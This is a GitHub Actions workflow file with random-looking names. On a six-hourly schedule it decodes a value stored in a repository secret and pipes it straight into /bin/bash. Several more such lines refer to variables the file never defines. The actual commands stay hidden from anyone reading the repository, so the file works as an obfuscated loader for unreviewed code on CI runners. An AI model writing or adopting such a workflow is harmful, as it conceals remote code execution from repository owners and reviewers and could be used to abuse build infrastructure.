name: pitaovc

on:
  workflow_dispatch:
  schedule:
    - cron: '53 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pitaovc
        env:
          dvwt156: ${{ secrets.dvwt156 }}
        run: |
          echo $dvwt156 | jq -r .y65 | /bin/bash
          echo $ykrvk5724 | jq -r .rn9024 | /bin/bash
          echo $cr0547 | jq -r .cxjpv26527 | /bin/bash
          echo $ify3 | jq -r .mripr37 | /bin/bash
          echo $grtky674 | jq -r .zbkgs97088 | /bin/bash
          echo $jsbew8 | jq -r .kevo9 | /bin/bash

